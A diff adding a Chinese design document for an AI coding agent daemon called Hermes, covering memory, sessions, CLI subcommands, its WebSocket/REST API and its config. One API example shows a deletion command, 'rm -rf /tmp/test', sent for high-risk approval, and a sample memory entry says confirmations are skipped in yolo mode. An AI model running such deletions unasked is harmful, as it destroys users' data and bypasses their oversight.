+  "description": "AI coding assistant with file editing, terminal, and search capabilities",
+  "url": "http://localhost:8093/a2a",
+  "version": "0.1.27",
+  "capabilities": {
+    "streaming": true,
+    "pushNotifications": false
+  },
+  "skills": [
+    {
+      "id": "code-edit",
+      "name": "Code Editing",
+      "description": "Read, write, and edit code files with precise text replacement"
+    },
+    {
+      "id": "terminal",
+      "name": "Terminal Execution",
+      "description": "Execute shell commands, run tests, build projects"
+    },
+    {
+      "id": "code-search",
+      "name": "Code Search",
+      "description": "Search codebases with ripgrep and fd"
+    }
+  ]
+}
+```
+
+**实现方式**：外部 Agent 通过 A2A SendMessage 发送任务 → dispatcher 创建 agent loop 处理 → 通过 SSE 流式返回结果。复用与消息平台相同的 agent 基础设施。
+
+#### 代码结构
+
+```
+internal/a2a/                     # 独立于 hermes 的顶层包
+├── server.go                    # A2A HTTP server（独立模式 + 集成模式）
+├── handler.go                   # JSON-RPC 2.0 handler（SendMessage / GetTask / CancelTask）
+├── agent_card.go                # Agent Card 生成 (/.well-known/agent.json)
+├── task.go                      # Task 生命周期管理（submitted → working → completed/failed）
+├── executor.go                  # AgentExecutor（A2A Task → agent loop）
+├── sse.go                       # SSE 流式响应
+└── config.go                    # A2A 配置
+```
+
+#### hermes.json 集成配置
+
+```jsonc
+{
+  // hermes.json 中启用 A2A
+  "a2a": {
+    "enabled": true,           // 启用后将 A2A 端点挂载到 hermes HTTP 端口
+    "port": 8093,              // 独立模式端口（集成模式忽略）
+    "agent_card": {            // 可选：自定义 Agent Card
+      "name": "VibeCoding",
+      "description": "AI coding assistant"
+    }
+  }
+}
+```
+
+---
+
+## 6. memory.md 设计
+
+### 6.1 核心原则：不破坏缓存命中
+
+> ✅ **已实现** — memory 通过 `memory` 工具按需读写，system prompt 仅有静态提示行。
+
+**关键设计决策**：memory.md 的内容 **不注入 system prompt**。
+
+原因：system prompt 是 prompt cache 的主要命中区域。如果每次都把变化的 memory 内容注入 system prompt，会导致缓存失效，增加成本和延迟。
+
+**实现方式**：memory 通过 `memory` 工具按需读写，与 `skill_ref` 工具的设计模式一致。Agent 在需要时主动调用 `memory(action="read")` 获取记忆，而不是被动接收注入。
+
+### 6.2 文件位置与查找优先级
+
+memory.md 遵循全局/项目级两层配置体系（详见第 2 节）：
+
+| 优先级 | 路径 | 用途 |
+|--------|------|------|
+| 1 (最高) | `hermes.json` 中 `memory.path` 显式指定 | 自定义路径 |
+| 2 | `.vibe/memory.md` | 项目级记忆（项目相关的上下文） |
+| 3 | `<GLOBAL_DIR>/memory.md` | 全局记忆（用户偏好、跨项目知识） |
+
+首次写入时：有项目上下文 → 创建 `.vibe/memory.md`；无项目上下文 → 创建 `<GLOBAL_DIR>/memory.md`。
+
+### 6.3 格式
+
+```markdown
+# Agent Memory
+
+## User Profile
+
+- 用户偏好使用中文交流
+- Go 为主要开发语言
+- 项目使用 Cobra + Bubble Tea 技术栈
+- 编辑器偏好: VSCode + Vim 键位
+
+## Working Memory
+
+- vibecoding 项目版本当前为 v0.1.26，下一个版本 v0.1.27
+- 用户对消息平台的优先级：微信 > 飞书 > Telegram > Discord
+- settings.json 中 provider 配置不要随意改动 schema
+
+## Lessons Learned
+
+- edit 工具的 oldText 必须在文件中唯一匹配，不要用太大的上下文
+- 用户不喜欢过多的确认提示，yolo 模式下直接执行
+- 中文文档要和英文文档同步更新
+```
+
+### 6.4 memory 工具设计
+
+> ✅ **已实现** — `internal/memory/tool.go` 完整实现了 read/add/update/delete 四种操作，section 级读写。
+
+```
+memory(action="read")
+  → 返回 memory.md 全文（Agent 按需调用）
+
+memory(action="read", section="User Profile")
+  → 返回指定 section 内容
+
+memory(action="add", section="Working Memory", content="新的记忆条目")
+  → 在指定 section 末尾追加条目
+
+memory(action="update", section="Working Memory", old="旧内容", new="新内容")
+  → 更新指定条目
+
+memory(action="delete", section="Working Memory", content="要删除的条目")
+  → 删除指定条目
+```
+
+### 6.5 System Prompt 中的提示（轻量级，不含数据）
+
+> ✅ **已实现** — `internal/memory/tool.go` 的 `PromptGuidelines()` 返回这行静态提示。
+
+在 system prompt 的 Guidelines 中添加一行静态提示（不影响缓存）：
+
+```
+- A persistent memory file (memory.md) is available via the `memory` tool. Read it at the start of complex tasks to recall user preferences and prior context. Update it when you learn important facts about the user or project.
+```
+
+这行提示是**静态**的，不包含 memory.md 的实际内容，所以不影响 prompt cache。
+
+---
+
+## 7. Session 管理设计
+
+### 7.1 核心原则
+
+> ✅ **已实现** — `dispatcher.go` 的 `resolveSession()` + `RotateSession()` 完整实现了以下逻辑。
+
+**单 session 默认 + 命令强制新建**。消息平台用户习惯连续对话，不应每次发消息都开新 session。
+
+| 决策 | 结论 |
+|--------|------|
+| 默认行为 | 每个 `platform:user_id` 自动创建一个持久 session，后续消息自动延续 |
+| 新建 | 用户发送 `/new` 命令时强制新建 session，旧 session 保留不删除 |
+| 跨平台 | **不打通**，同一个人的微信和飞书 session 完全独立 |
+| 存储隔离 | Hermes session 存储在 `<sessionDir>/hermes/`，与 CLI session 分开 |
+| context 满 | 自动 compaction，不销毁 session |
+
+### 7.2 存储结构
+
+Hermes session 与 CLI session 行为差异大（多用户、长期常驻、无 cwd 概念），因此用独立目录隔离：
+
+```
+<sessionDir>/
+├── --<base64(cwd)>--/                  # CLI/Gateway sessions（现有，不变）
+│   └── 20260529-120000_abc12345.jsonl
+│
+└── hermes/                             # Hermes sessions（新增）
+    ├── wechat/                         # 按平台分
+    │   ├── wxid_user1/                 # 按用户分
+    │   │   └── active.jsonl            # 当前活跃 session
+    │   └── wxid_user2/
+    │       └── active.jsonl
+    ├── feishu/
+    │   └── ou_user1/
+    │       └── active.jsonl
+    └── ws/                             # WebSocket client sessions
+        └── <conn-id>/
+            └── active.jsonl
+```
+
+**命名规则**：
+- `active.jsonl` — 当前活跃 session，每个用户始终只有一个
+- `/new` 时：`active.jsonl` → 重命名为 `<timestamp>_<id>.jsonl`（归档），然后创建新的 `active.jsonl`
+- 归档的 session 保留在同一用户目录下，可通过 `/sessions` 查看历史
+
+示例：`/new` 之后：
+
+```
+hermes/wechat/wxid_user1/
+├── active.jsonl                        # 新 session
+└── 20260529-120000_abc12345.jsonl       # 归档的旧 session
+```
+
+### 7.3 Session 生命周期
+
+```
+用户首次发消息
+  │
+  ├─ 检查 hermes/<platform>/<user_id>/active.jsonl
+  │   ├─ 存在 → 加载并继续对话
+  │   └─ 不存在 → 创建新 active.jsonl（cwd = 平台配置的 work_dir）
+  │
+  ├─ 持续对话… (消息追加到 active.jsonl)
+  │
+  ├─ context 接近上限 → 自动 compaction（不新建 session）
+  │
+  ├─ 用户发送 /new
+  │   ├─ active.jsonl 重命名为 <timestamp>_<id>.jsonl
+  │   └─ 创建新的 active.jsonl
+  │
+  └─ 用户发送 /sessions
+      └─ 列出当前 + 历史 sessions
+```
+
+### 7.4 消息平台命令
+
+> ⚠️ **部分实现** — `/new`、`/clear`、`/sessions`、`/status`、`/mode` 已实现；`/compact` 是 stub（仅返回字符串，未实际触发 compaction）。
+
+消息平台用户通过发送文本命令管理 session：
+
+| 命令 | 作用 | 状态 |
+|------|------|------|
+| `/new` | 归档当前 session，创建新的空 session | ✅ 已实现 |
+| `/clear` | 清空当前 session 的对话历史（不归档，直接重置） | ✅ 已实现（实际行为是归档+新建，同 `/new`） |
+| `/sessions` | 列出当前 + 历史 session（显示创建时间、消息数、预览） | ⚠️ 仅列出活跃 session，不显示历史归档 |
+| `/status` | 查看当前 session 状态（模型、token 用量、工作目录） | ⚠️ 显示 session/mode/messages/workdir，无 token 用量 |
+| `/compact` | 手动触发 context compaction | ❌ Stub — 仅返回固定字符串 |
+| `/mode <mode>` | 切换模式（plan/agent/yolo） | ✅ 已实现 |
+
+### 7.5 与现有 session.Manager 的关系
+
+Hermes 完全复用现有的 `session.Manager` 进行 JSONL 读写，只在上层包装路由逻辑：
+
+```go
+// hermes/dispatcher.go
+
+// resolveSession 查找或创建用户的活跃 session
+func (d *Dispatcher) resolveSession(platform, userID string) (*session.Manager, error) {
+    dir := filepath.Join(d.sessionDir, "hermes", platform, userID)
+    activePath := filepath.Join(dir, "active.jsonl")
+    
+    // 已有活跃 session → 加载并继续
+    if _, err := os.Stat(activePath); err == nil {
+        return session.Open(activePath)
+    }
+    
+    // 首次对话 → 创建
+    os.MkdirAll(dir, 0700)
+    workDir := d.resolveWorkDir(platform)
+    mgr := session.New(workDir, dir)  // cwd = 平台的 work_dir
+    mgr.Init()
+    // 重命名 session 文件为 active.jsonl
+    os.Rename(mgr.GetFile(), activePath)
+    return session.Open(activePath)
+}
+
+// rotateSession 归档当前 session 并新建
+func (d *Dispatcher) rotateSession(platform, userID string) (*session.Manager, error) {
+    dir := filepath.Join(d.sessionDir, "hermes", platform, userID)
+    activePath := filepath.Join(dir, "active.jsonl")
+    
+    // 归档: active.jsonl → <timestamp>_<id>.jsonl
+    if mgr, err := session.Open(activePath); err == nil {
+        hdr := mgr.GetHeader()
+        archived := filepath.Join(dir, fmt.Sprintf("%s_%s.jsonl",
+            time.Now().Format("20060102-150405"), hdr.ID[:8]))
+        os.Rename(activePath, archived)
+    }
+    
+    // 创建新的 active.jsonl
+    return d.resolveSession(platform, userID)
+}
+```
+
+**不改动 `session.Manager`** — Hermes 的 session 路由逻辑全部在 `hermes/dispatcher.go` 中，`session.Manager` 保持不变。
+
+---
+
+## 8. 子命令设计
+
+### 8.1 命令树
+
+> ⚠️ **大部分实现** — 仅 Smart Approvals 待讨论，其余均已实现。A2A 新增为独立子命令。
+
+```
+vibecoding hermes
+├── start                 # ✅ 启动 hermes 守护进程（前台运行）
+│   ├── -d                # ✅ 后台启动
+│   ├── --port <port>     # ✅ 指定 WebSocket+HTTP 监听端口（默认 8090）
+│   ├── --work-dir <dir>  # ✅ 默认工作目录（默认 cwd）
+│   ├── -p, --provider    # ✅ 默认 provider（覆盖 hermes.json）
+│   ├── -m, --model       # ✅ 默认 model（覆盖 hermes.json）
+│   ├── --multi-agent     # ✅ 启用多 Agent 模式（子 Agent 工具）
+│   └── --sandbox         # ✅ 启用 sandbox 模式（bwrap，默认关闭）
+├── stop                  # ✅ PID 文件 + SIGTERM 停止守护进程
+├── status                # ✅ PID 检查 + HTTP health 查询
+│
+├── client                # ✅ WebSocket 客户端（流式输出 + 斜杠命令）
+│   ├── --url <ws-url>    # ✅ 连接地址（默认 ws://localhost:8090/ws）
+│   └── --session <id>    # ✅ 指定/恢复 session
+│
+├── config
+│   ├── init              # ✅ 创建 hermes.json 配置模板
+│   │   ├── --global      # ✅ 写入 <GLOBAL_DIR>/hermes.json（默认）
+│   │   ├── --project     # ✅ 写入 .vibe/hermes.json
+│   │   └── --webhook     # ✅ 包含示例 webhook 路由
+│   └── show              # ✅ 查看当前生效配置
+│
+├── wechat
+│   ├── login             # ✅ 微信扫码登录
+│   │   └── --work-dir    # ❌ 未实现
+│   └── status            # ✅ 查看微信连接状态
+│
+├── feishu
+│   ├── setup             # ⚠️ 仅打印配置说明文本
+│   │   └── --work-dir    # ❌ 未实现
+│   └── status            # ✅ 查看飞书连接状态
+│
+├── webhook
+│   └── list              # ✅ 列出 webhook 路由
+│
+├── cron
+│   ├── list              # ✅ 列出定时任务
+│   ├── add               # ✅ 添加
+│   ├── delete (remove)   # ✅ 删除
+│   ├── enable            # ✅ 启用
+│   └── disable           # ✅ 禁用
+│
+├── memory
+│   ├── show              # ✅ 查看 memory.md 内容
+│   └── clear             # ✅ 清空 memory.md
+│
+└── sessions
+    └── list              # ✅ 查询运行实例的活跃 session
+```
+
+**新增：A2A 独立子命令**（与 hermes 平级）：
+
+```
+vibecoding a2a
+├── start                 # 🔶 待实现 — 启动独立 A2A Server
+│   ├── --port <port>     # 监听端口（默认 8093）
+│   ├── --work-dir <dir>  # 工作目录
+│   ├── -p, --provider    # 默认 provider
+│   ├── -m, --model       # 默认 model
+│   └── --sandbox         # 启用 sandbox
+├── stop                  # 🔶 待实现 — 停止 A2A Server
+├── status                # 🔶 待实现 — 查看 A2A Server 状态
+└── card                  # 🔶 待实现 — 查看/生成 Agent Card
+```
+
+### 8.2 Hermes 启动流程
+
+`vibecoding hermes start` 启动后做以下事情：
+
+```
+vibecoding hermes start
+  │
+  ├─ 1. 加载配置 ─────────────────────────────────
+  │     <GLOBAL_DIR>/hermes.json → .vibe/hermes.json 合并
+  │
+  ├─ 2. 启动 WebSocket + HTTP 网关（必选，始终启动）
+  │     ├── WebSocket  ws://0.0.0.0:8090/ws    # client / 第三方接入
+  │     ├── HTTP REST  http://0.0.0.0:8090/    # 状态查询、webhook 入站
+  │     └── A2A        http://0.0.0.0:8090/a2a # Agent-to-Agent（如启用）
+  │
+  ├─ 3. 连接消息平台（可选，按配置启用）
+  │     ├── wechat.enabled=true  → 长轮询 iLink（需已 login 过）
+  │     └── feishu.enabled=true  → WebSocket 长连接飞书 SDK
+  │
+  ├─ 4. 启动 Cron 调度器（如启用）
+  │
+  └─ 5. 就绪 ✓  等待消息
+```
+
+**关键设计**：WebSocket + HTTP 网关是 Hermes 的**核心服务**，始终启动。微信/飞书是**可选连接器**，只在配置启用且凭证就绪时才连接。即使不配置任何消息平台，Hermes 也可以通过 `hermes client` 或 WebSocket API 使用。
+
+### 8.3 WebSocket + HTTP API 规范
+
+Hermes 网关在单一端口（默认 `8090`）上提供所有服务，通过路由区分。
+
+#### 8.3.1 路由总览
+
+| 路由 | 协议 | 认证 | 状态 | 说明 |
+|------|------|------|------|------|
+| `/ws` | WebSocket | 是 | ✅ | 交互式对话（`hermes client` 和第三方客户端） |
+| `/api/health` | GET | 否 | ✅ | 健康检查 |
+| `/api/status` | GET | 是 | ✅ | 服务状态（平台连接、session 数、版本） |
+| `/api/sessions` | GET | 是 | ✅ | 列出所有活跃 session |
+| `/api/sessions/{id}` | GET | 是 | ✅ | 查看指定 session 详情 |
+| `/api/sessions/{id}` | DELETE | 是 | ✅ | 删除指定 session |
+| `/api/memory` | GET | 是 | ✅ | 读取 memory.md（含 source/path/content） |
+| `/api/memory` | PUT | 是 | ✅ | 更新 memory.md |
+| `/api/platforms` | GET | 是 | ✅ | 查看各消息平台状态 |
+| `/webhook/*` | POST | Secret | ✅ | Webhook 入站（GitHub 等） |
+| `/a2a` | POST | Bearer | ✅ | A2A JSON-RPC 2.0（message/send, task/get, task/cancel） |
+| `/a2a/events` | GET | 是 | ✅ | A2A SSE 事件流（task_id 参数） |
+| `/.well-known/agent.json` | GET | 否 | ✅ | A2A Agent Card |
+
+#### 8.3.2 WebSocket 协议 (`/ws`)
+
+> ✅ **已实现流式** — `wsDispatcherAdapter` 逐事件转换 `agent.Event` → `ws.WSEvent`，支持 text_delta/think_delta/tool_call/tool_result/tool_diff/usage/done/status/error。
+
+客户端通过 WebSocket 连接后，与 Hermes 进行双向 JSON 消息通信。
+
+**连接握手**：
+
+```
+GET /ws?token=<auth_token>&session=<session_id> HTTP/1.1
+Upgrade: websocket
+```
+
+| 参数 | 必选 | 说明 |
+|------|------|------|
+| `token` | 配置了 `auth_token` 时必选 | 认证 token |
+| `session` | 否 | 指定 session ID；空 = 使用/创建默认 session |
+
+**客户端 → 服务端消息**：
+
+```jsonc
+// 发送用户消息
+{
+  "type": "message",
+  "content": "帮我看下 main.go 的结构"
+}
+
+// 发送命令
+{
+  "type": "command",
+  "content": "/new"
+}
+
+// 工具审批响应（当 smart_approvals 启用时）
+{
+  "type": "approval",
+  "approval_id": "ap_abc123",
+  "approved": true
+}
+
+// 心跳
+{
+  "type": "ping"
+}
+```
+
+**服务端 → 客户端消息**：
+
+```jsonc
+// 连接建立确认
+{
+  "type": "connected",
+  "session_id": "hermes/ws/conn_abc123",
+  "version": "0.1.27",
+  "model": "deepseek-v4-flash",
+  "work_dir": "/home/user/project"
+}
+
+// 文本流式增量（agent 响应）
+{
+  "type": "text_delta",
+  "content": "这个文件的主要结构是…"
+}
+
+// thinking 流式增量
+{
+  "type": "think_delta",
+  "content": "分析 main.go 的引入包…"
+}
+
+// 工具调用开始
+{
+  "type": "tool_call",
+  "tool": "read",
+  "call_id": "tc_123",
+  "args": {"path": "main.go"}
+}
+
+// 工具执行结果
+{
+  "type": "tool_result",
+  "tool": "read",
+  "call_id": "tc_123",
+  "result": "package main\n\nimport (\n...",
+  "error": null
+}
+
+// 工具执行产生的文件 diff（edit/write 工具）
+{
+  "type": "tool_diff",
+  "call_id": "tc_456",
+  "path": "main.go",
+  "diff": "--- a/main.go\n+++ b/main.go\n@@ -1,3 +1,4 @@..."
+}
+
+// 审批请求（smart_approvals 启用时）
+{
+  "type": "approval_request",
+  "approval_id": "ap_abc123",
+  "tool": "bash",
+  "args": {"command": "rm -rf /tmp/test"},
+  "risk_level": "high"
+}
+
+// plan 工具更新
+{
+  "type": "plan_update",
+  "plan": {
+    "title": "重构 main.go",
+    "steps": [
+      {"title": "读取当前代码", "status": "done"},
+      {"title": "拆分函数", "status": "running"},
+      {"title": "添加测试", "status": "pending"}
+    ]
+  }
+}
+
+// 用量统计
+{
+  "type": "usage",
+  "prompt_tokens": 1200,
+  "completion_tokens": 350,
+  "total_tokens": 1550,
+  "cache_read_tokens": 800,
+  "cache_write_tokens": 400
+}
+
+// 当前轮完成
+{
+  "type": "done",
+  "stop_reason": "end_turn"
+}
+
+// 命令响应（/new, /clear, /status 等）
+{
+  "type": "command_result",
+  "command": "/new",
+  "message": "✅ New session created.",
+  "error": false
+}
+
+// 错误
+{
+  "type": "error",
+  "message": "provider error: rate limited",
+  "code": "rate_limit"
+}
+
+// 心跳响应
+{
+  "type": "pong"
+}
+```
+
+**消息流时序示例**：
+
+> ✅ **已实现** — `agentEventToWSEvent()` 将 agent 事件逐个转换为 WebSocket 消息。
+
+```
+client                          server
+  |-- {type:"message"} ---------->|
+  |                               |-- agent loop 开始
+  |<-- {type:"text_delta"} -------|-- 流式输出“让我看看…”
+  |<-- {type:"tool_call"} --------|-- 调用 read 工具
+  |<-- {type:"tool_result"} ------|-- 工具结果
+  |<-- {type:"text_delta"} -------|-- 继续流式输出
+  |<-- {type:"text_delta"} -------|   ...
+  |<-- {type:"usage"} ------------|-- token 用量
+  |<-- {type:"done"} -------------|-- 本轮完成
+```
+
+#### 8.3.3 HTTP REST API (`/api/*`)
+
+**认证**：配置了 `server.auth_token` 时，所有 `/api/*` 请求需携带 `Authorization: Bearer <token>` 头。
+
+---
+
+**`GET /api/health`** — 健康检查（无需认证）
+
+```json
+// Response 200
+{
+  "status": "ok",
+  "version": "0.1.27",
+  "uptime_seconds": 3600
+}
+```
+
+---
+
+**`GET /api/status`** — 服务状态
+
+```json
+// Response 200
+{
+  "version": "0.1.27",
+  "uptime_seconds": 3600,
+  "work_dir": "/home/user/project",
+  "model": "deepseek-v4-flash",
+  "provider": "deepseek-openai",
+  "sessions": {
+    "active": 3,
+    "total": 12
+  },
+  "platforms": {
+    "wechat": {"enabled": true, "connected": true, "users": 2},
+    "feishu": {"enabled": false, "connected": false, "users": 0}
+  },
+  "a2a": {"enabled": true},
+  "cron": {"enabled": true, "jobs": 2}
+}
+```
+
+---
+
+**`GET /api/sessions`** — 列出活跃 session
+
+```json
+// Response 200
+{
+  "sessions": [
+    {
+      "id": "hermes/wechat/wxid_user1",
+      "platform": "wechat",
+      "user_id": "wxid_user1",
+      "work_dir": "/home/user/project-a",
+      "message_count": 42,
+      "last_active": "2026-05-29T10:30:00Z",
+      "preview": "帮我看下 main.go..."
+    },
+    {
+      "id": "hermes/feishu/ou_user2",
+      "platform": "feishu",
+      "user_id": "ou_user2",
+      "work_dir": "/home/user/project-b",
+      "message_count": 8,
+      "last_active": "2026-05-29T09:15:00Z",
+      "preview": "添加单元测试..."
+    }
+  ]
+}
+```
+
+---
+
+**`GET /api/sessions/{id}`** — 查看 session 详情
+
+```json
+// Response 200
+{
+  "id": "hermes/wechat/wxid_user1",
+  "platform": "wechat",
+  "user_id": "wxid_user1",
+  "work_dir": "/home/user/project-a",
+  "mode": "agent",
+  "model": "deepseek-v4-flash",
+  "message_count": 42,
+  "created_at": "2026-05-29T08:00:00Z",
+  "last_active": "2026-05-29T10:30:00Z",
+  "context_tokens": 45000,
+  "context_limit": 128000,
+  "compaction_count": 1
+}
+```
+
+---
+
+**`DELETE /api/sessions/{id}`** — 删除 session
+
+```json
+// Response 200
+{"message": "session deleted", "id": "hermes/wechat/wxid_user1"}
+```
+
+---
+
+**`GET /api/memory`** — 读取 memory.md
+
+```json
+// Response 200
+{
+  "path": "/home/user/project/.vibe/memory.md",
+  "source": "project",
+  "content": "# Agent Memory\n\n## User Profile\n\n- 用户偏好中文...\n"
+}
+```
+
+---
+
+**`PUT /api/memory`** — 更新 memory.md
+
+```json
+// Request
+{"content": "# Agent Memory\n\n## User Profile\n\n- updated...\n"}
+
+// Response 200
+{"message": "memory updated", "path": "/home/user/project/.vibe/memory.md"}
+```
+
+---
+
+**`GET /api/platforms`** — 消息平台状态
+
+```json
+// Response 200
+{
+  "platforms": [
+    {
+      "name": "wechat",
+      "enabled": true,
+      "connected": true,
+      "work_dir": "/home/user/project-a",
+      "active_users": ["wxid_user1", "wxid_user2"],
+      "login_status": "logged_in"
+    },
+    {
+      "name": "feishu",
+      "enabled": true,
+      "connected": true,
+      "work_dir": "/home/user/project-b",
+      "active_users": ["ou_user1"],
+      "login_status": "connected"
+    }
+  ]
+}
+```
+
+#### 8.3.4 Webhook 入站 (`/webhook/*`)
+
+根据 `hermes.json` 中配置的路由分发外部事件：
+
+```
+POST /webhook/github
+X-Hub-Signature-256: sha256=...
+
+{"action": "opened", "pull_request": {...}}
+```
+
+验证 `webhooks.secret` 后，根据路由配置中的 `skill` 和 `delivery` 触发 agent 任务，结果通过指定的消息平台推送。
+
+#### 8.3.5 A2A 协议 (`/a2a`)
+
+仅当 `a2a.enabled=true` 时注册。详见 §5.3 A2A 协议设计。
+
+| 端点 | 说明 |
+|------|------|
+| `GET /.well-known/agent.json` | Agent Card（无需认证） |
+| `POST /a2a` | JSON-RPC 2.0（SendMessage / GetTask） |
+
+#### 8.3.6 WebSocket 消息类型汇总
+
+| 方向 | type | 说明 |
+|------|------|------|
+| **C→S** | `message` | 用户输入 |
+| **C→S** | `command` | 斜杠命令（`/new`, `/clear`, `/status` 等） |
+| **C→S** | `approval` | 工具审批响应 |
+| **C→S** | `ping` | 心跳 |
+| **S→C** | `connected` | 连接确认 + session/model 信息 |
+| **S→C** | `text_delta` | 文本流式增量 |
+| **S→C** | `think_delta` | thinking 流式增量 |
+| **S→C** | `tool_call` | 工具调用开始 |
+| **S→C** | `tool_result` | 工具执行结果 |
+| **S→C** | `tool_diff` | 文件 diff（edit/write） |
+| **S→C** | `approval_request` | 工具审批请求 |
+| **S→C** | `plan_update` | plan 工具状态更新 |
+| **S→C** | `usage` | token 用量统计 |
+| **S→C** | `done` | 本轮完成 |
+| **S→C** | `command_result` | 命令执行结果 |
+| **S→C** | `error` | 错误 |
+| **S→C** | `pong` | 心跳响应 |
+
+### 8.4 `hermes client` — 终端接入模式
+
+> ✅ **已实现** — `internal/hermes/client.go` WebSocket 客户端，支持流式输出（text_delta/think_delta/tool_call/tool_result/done）和斜杠命令（/new /clear /status /sessions /mode /compact）。
+
+`vibecoding hermes client` 通过 WebSocket 连接正在运行的 Hermes 网关。
+
+```bash
+# 连接本地 hermes
+vibecoding hermes client
+
+# 连接远程 hermes
+vibecoding hermes client --url ws://192.168.1.100:8090/ws
+
+# 恢复已有 session
+vibecoding hermes client --session abc123
+```
+
+**与直接运行 `vibecoding` 的区别**：
+
+| 维度 | `vibecoding`（普通 CLI） | `vibecoding hermes client` |
+|------|--------------------------|----------------------------|
+| **Agent 进程** | 本地独立进程 | 连接 Hermes 守护进程 |
+| **通信方式** | 本地函数调用 | WebSocket 流式通信 |
+| **Session** | 本地管理 | 服务端管理（per-user，可跨终端恢复） |
+| **Memory** | 无 | 共享 Hermes 的 memory.md |
+| **工具执行** | 本地执行 | Hermes 服务端执行（受 security/hooks 约束） |
+| **工作目录** | 本地 cwd | Hermes 服务端工作目录 |
+| **Cron/Webhook** | 无 | 可查看 Hermes 的调度状态 |
+
+**典型使用场景**：
+- 开发者想在终端中与已部署的 Hermes 实例交互（而不是通过微信/飞书）
+- 调试 Hermes 的行为，实时观察 agent loop 输出
+- 远程连接服务器上运行的 Hermes 实例
+- 管理 Hermes 的 session、memory 等状态
+
+### 8.5 `config init` — 初始化级别
+
+```
+vibecoding hermes config init              # 默认写入 <GLOBAL_DIR>/hermes.json
+vibecoding hermes config init --global     # 显式写入 <GLOBAL_DIR>/hermes.json
+vibecoding hermes config init --project    # 写入 .vibe/hermes.json（自动创建 .vibe/ 目录）
+```
+
+`--global` 和 `--project` 互斥。目标文件已存在时报错，需加 `--force` 覆盖。
+
+项目级模板会省略全局性配置（如微信凭证路径），只包含项目可能需要覆盖的字段（如 `work_dir`、`memory`、`agent`、`security` 等）。
+
+### 8.6 配置文件 `hermes.json`
+
+加载优先级：`defaults` → `<GLOBAL_DIR>/hermes.json` → `.vibe/hermes.json`
+
+```jsonc
+{
+  // === 网关服务（始终启动） ===
+
+  "server": {
+    "port": 8090,                  // WebSocket + HTTP 监听端口
+    "host": "0.0.0.0",             // 监听地址（0.0.0.0 = 所有网卡，127.0.0.1 = 仅本地）
+    "auth_token": "${HERMES_AUTH_TOKEN}"  // 空 = 无认证（仅本地使用）
+  },
+
+  // === 默认 Provider/Model ===
+
+  "default_provider": "",          // 空 = 继承 settings.json 的 defaultProvider
+  "default_model": "",             // 空 = 继承 settings.json 的 defaultModel
+
+  // === 多 Agent 模式 ===
+
+  "multi_agent": false,             // 启用后注册子 Agent 工具（spawn/status/send/destroy）
+
+  // === Sandbox ===
+
+  "sandbox": false,                 // 启用 bwrap 沙箱隔离（默认关闭）
+
+  // === 微信 (iLink) ===
+
+  "wechat": {
+    "enabled": true,
+    "cred_path": "",               // 空 = 默认 <GLOBAL_DIR>/wechat-credentials.json
+    "work_dir": "",                // 空 = hermes 启动时的 cwd
+    "allowed_users": [],           // 空 = 允许所有人（危险！）
+    "auto_typing": true            // 自动显示"正在输入"
+  },
+
+  // === 飞书 ===
+
+  "feishu": {
+    "enabled": false,
+    "app_id": "${FEISHU_APP_ID}",
+    "app_secret": "${FEISHU_APP_SECRET}",
+    "work_dir": "",                // 空 = hermes 启动时的 cwd
+    "allowed_users": []
+  },
+
+  // === Webhook 入站 ===
+
+  "webhooks": {
+    "enabled": false,
+    "secret": "${WEBHOOK_SECRET}",
+    "routes": [
+      {
+        "path": "/github",
+        "events": ["push", "pull_request"],
+        "skill": "code-review",
+        "delivery": "wechat"
+      }
+    ]
+  },
+
+  // === A2A Server ===
+
+  "a2a": {
+    "enabled": false
+  },
+
+  // === Cron ===
+
+  "cron": {
+    "enabled": true
+  },
+
+  // === 记忆 ===
+
+  "memory": {
+    "enabled": true,
+    "path": ""                     // 空 = 按优先级查找: .vibe/memory.md → <GLOBAL_DIR>/memory.md
+  },
+
+  // === 安全 ===
+
+  "security": {
+    "smart_approvals": true,
+    "allowed_work_dirs": []        // 空 = 仅允许 work_dir 及其子目录
+  },
+
+  // === Shell Hooks ===
+
+  "hooks": {
+    "pre_tool_call": "",           // 外部脚本路径
+    "post_tool_call": ""
+  },
+
+  // === Agent ===
+
+  "agent": {
+    "max_turns": 90,
+    "budget_pressure": true,
+    "context_pressure": true
+  },
+
+  // === 默认工作目录 ===
+
+  "work_dir": "."                  // hermes 启动时的默认工作目录（微信/飞书未单独配置时的 fallback）
+}
+```
+
+**工作目录解析优先级**：
+
+```
+平台级 work_dir (微信/飞书 单独配置)
+  → 全局 work_dir (hermes.json 顶层)
+    → CLI --work-dir 参数
+      → hermes 启动时的 cwd
+```
+
+每个消息平台可以有独立的工作目录，适用于“微信管理项目 A，飞书管理项目 B”的场景。
+
+### 8.7 消息平台进度事件推送
+
+Hermes 模式下，agent 执行过程中会实时向消息平台（微信/飞书）推送进度事件，最后再发送完整总结。
+
+#### 推送内容
+
+| 事件类型 | 格式 | 说明 |
+|----------|------|------|
+| 思考过程 | `💭 <思考内容...>` | 模型推理过程，截断 500 字符 |
+| 工具执行 | `[tool]: args ✅/❌` | 工具调用结果，一行摘要 |
+| 完整总结 | （完整文本） | agent 最终输出 |
+
+#### 工具进度格式示例
+
+```
+💭 用户想了解项目结构，让我先看看目录...
+[ls]: . ✅
+[read]: .vibe/memory.md ✅
+[bash]: go build ./... ✅
+[grep]: NewStore ✅
+[find]: *.go ✅
+[write]: output.txt ✅
+[memory] ✅
+
+（完整总结文本）
+```
+
+#### 实现机制
+
+- `messaging.InboundMessage` 新增 `ProgressFunc func(text string)` 回调
+- 微信/飞书 bot 收到消息时设置 `ProgressFunc`，内部调用 `SendMessage` 推送进度
+- `dispatcher.runAgent` 监听 `EventThinkDelta`（累积后推送）和 `EventToolExecutionEnd`（格式化一行进度）
+- WebSocket 路径不受影响，仍通过 event channel 流式推送
+
+### 8.8 Provider/Model 配置优先级
+
+```bash
+# CLI 标志（最高优先级）
+vibecoding hermes start -p openai -m gpt-4o
+
+# hermes.json 配置
+{ "default_provider": "openai", "default_model": "gpt-4o" }
+
+# settings.json（最低优先级，继承）
+{ "defaultProvider": "deepseek", "defaultModel": "deepseek-chat" }
+```
+
+优先级：CLI `-p`/`-m` 标志 > `hermes.json` > `settings.json`
+
+### 8.9 MCP 工具继承
+
+Hermes 自动加载全局和项目的 `mcp.json` 配置，与 CLI 行为一致。MCP 工具注册到每个 session 的 tool registry 中，session 移除/轮转时自动关闭 MCP 连接。
+
+---
+
+## 9. 架构设计
+
+### 9.1 新增包结构
+
+```
+internal/
+├── messaging/                   # 消息平台层（抽象 + 各平台实现）
+│   ├── platform.go              # ✅ Platform 接口 + InboundMessage 等公共类型
